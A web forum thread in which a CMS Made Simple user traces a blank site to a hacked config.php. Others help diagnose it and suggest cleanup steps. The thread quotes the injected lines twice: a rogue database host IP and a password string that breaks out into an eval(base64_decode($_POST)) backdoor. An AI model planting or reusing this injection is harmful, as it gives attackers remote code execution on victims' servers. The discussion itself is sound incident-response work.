CMS Made Simple Forums

Hello all!

I installed our CMSMS two years ago, it is version is 1.11.11, nothing has been changed for weeks.

Today we suddenly have an empty white homepage. Also when trying to get into the backend, I can not, because the login page also comes up blank. We did not change anything for weeks. And the provider changed to PHP 5.4 about a year ago.

I have other CMSMS installations, even older versions, at the same provider and they run fine.

One difference is: our site uses https and its forced via .htaccess
but that was always the case, worked until now.

I tried access the site without the .htaccess, so, no https forcing, but did not work either.

Any ideas?

Regards
Thom

Hi Rolf

Thanks for the quick response.
I tried $config['debug'] = true; but it makes no difference, I still only get a white page, nothing at all. And no idea as of what may be the cause, or how to get to it without backend access... strange

I also had these blank pages recently.
I found the error after I had put these lines in the config.php (and deleted them after having solved the errors)

Hi Jos
Thanks! Your input was right. I got an error message leading me to the other config settings and indeed: They were completely wrong. (I could have seen that but I did not ever think they could have been changed).

Now, is it possible we got hacked???

it looked like this:

$config['db_hostname'] = '209.59.130.213';
$config['db_username'] = 'er';
$config['db_password'] = '';eval ( base64 _ decode($_POST[' a1 '])); exit;//';
$config['db_name'] = 'error';

Yes, that is definitely a sign of a hacked website... :-/
Do you have back-ups?

Thanks Rolf. But how is this possible? I have never heard of a CMSMS website got hacked. Its not a rewarding target, not like Wordpress or Joomla.

At least it seems only config.php got hacked.

Following the article here https://raam.org/2013/cleaning-evalbase ... e-via-ssh/

When I check all files (after downloading from ftp and search content of all files), the malicious code containing "eval(base64_decode" can not be found except in config.

For sure a website made with CMSMS can be hacked. But CMSMS isn't the cause...

Can be bad web host.
To easy to break FTP passwords.
Virus on the computer of the editors that put scripts on the webserver along with file uploads.
Old Core or Module versions. (not upgraded)
Other CMS's or old website at the same client webserver.
Etc.

Shared server with WP installed some where on it that let someone in..?

Hi Dr. CSS

Good question, but no, not WordPress. But I digged a bit around, because we have in fact a forum software installed (not me though), Burning Board by Woltlab. And I found several reports about eval(base64_decode insertions there. The Board itself seems unharmed, but I suppose it looked for the top config file to infect, and got the one of CMSMS. Then if it was looking for WP typical folder structure, there is none. And so only config got affected.

Hi thomahawk, I had exactly the same scenario happen yesterday to one of my sites.

Same config details and all:
$config['db_hostname'] = '209.59.130.213';
$config['db_username'] = 'er';
$config['db_password'] = '';eval ( base 64_decode ($_POST[ 'a1' ]));ex it; //';

After scanning my files, I found a corruption in another CMSMS site - on the same shared server - check in the root directory for a file "whatever domain name"/google .php.

Probably worth a look.

Cheers,

Paul

Hi pwg

What else do you have hosted excpet CMSMS? In my case there is a Burning Board forum. I suppose the thing came in through there.

No, I could not find a google.php file. But thanks for the suggestion.

I let things as they are now and wait some days. I want to see if it happens again.

Is your hosting account shared, VPS, or a dedicated server?

If it is shared then it doesn't need to be something you host it could be from another customer on the same machine.

Contact your hoster, most will help you try to figure out how they got in.

If they got in through your account, check the access logs for GET and POST request. Also check logs for other services that are on your machine (like ftp/ssh)

I got a report from the hoster, he says they entered using the index.php file and installed into the install folder.

That folder was still on the server, despite the fact that I always remove it, I don't know how that happened.